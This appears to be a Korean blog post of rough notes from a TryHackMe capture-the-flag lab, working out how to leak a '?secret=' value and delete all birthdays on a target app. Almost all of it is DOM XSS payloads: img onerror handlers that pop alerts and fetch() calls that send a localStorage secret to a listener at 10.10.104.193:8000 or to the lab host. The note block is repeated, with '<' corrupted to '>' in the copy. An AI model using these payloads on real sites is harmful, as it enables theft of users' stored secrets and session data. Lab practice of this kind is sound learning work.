how to delete all birthdays
-> to get to know `?secret=` value
-> using DOM xss ?
https://realwebsite.com#<img src=1 onerror=alert(document.secret)></img>
=> checking the dom xss attack is working
=> using this how to know the secret value ?
document.secret?
https://realwebsite.com#<img src=1 onerror="fetch('http://10.10.104.193:8000?secret=' + localStorage.getItem('secret'))"></img>
<img src=1 onerror="fetch('http://10.10.104.193:8000' + localStorage.getItem('secret'))">
https://realwebsite.com#<img src = 1 onerror=alert(localStorage.getItem('secret'))>
https://realwebsite.com#<img src=1 onerror=alert(panda)></img>
<img src=1 onerror="window.location='http://lists.tryhackme.loc:5001/ping'">
<img src=1 onerror="fetch('http://lists.tryhackme.loc:5173/bdays/45e358301c6946548b72d15c3e2ab797?secret=' + localStorage.getItem('secret'))">
http://lists.tryhackme.loc:5173/bdays/45e358301c6946548b72d15c3e2ab797?secret=
how to delete all birthdays
-> to get to know `?secret=` value
-> using DOM xss ?
https://realwebsite.com#>img src=1 onerror=alert(document.secret)></img>
=> checking the dom xss attack is working
=> using this how to know the secret value ?
document.secret?
https://realwebsite.com#>img src=1 onerror="fetch('http://10.10.104.193:8000?secret=' + localStorage.getItem('secret'))"></img>
>img src=1 onerror="fetch('http://10.10.104.193:8000' + localStorage.getItem('secret'))">
https://realwebsite.com#>img src = 1 onerror=alert(localStorage.getItem('secret'))>
https://realwebsite.com#>img src=1 onerror=alert(panda)></img>
>img src=1 onerror="window.location='http://lists.tryhackme.loc:5001/ping'">
>img src=1 onerror="fetch('http://lists.tryhackme.loc:5173/bdays/45e358301c6946548b72d15c3e2ab797?secret=' + localStorage.getItem('secret'))">
http://lists.tryhackme.loc:5173/bdays/45e358301c6946548b72d15c3e2ab797?secret=
'호그와트' 카테고리의 다른 글
미로르미롤미로를 찾아서 (0) | 2024.07.13 |
---|---|
pico ctf 이 미띤 넘들 (0) | 2024.07.12 |
그거 아시나요? 한 개의 레몬에는 무려 네 개의 레몬에 해당하는 비타민이 들어있다는 사실을 (0) | 2024.07.10 |
전세계 코로나 데이터 분석에 관하여 (3) by 영웅 A to Z (0) | 2024.07.08 |
전세계 코로나 데이터 분석에 관하여 (2) by 영웅 A to Z (0) | 2024.07.08 |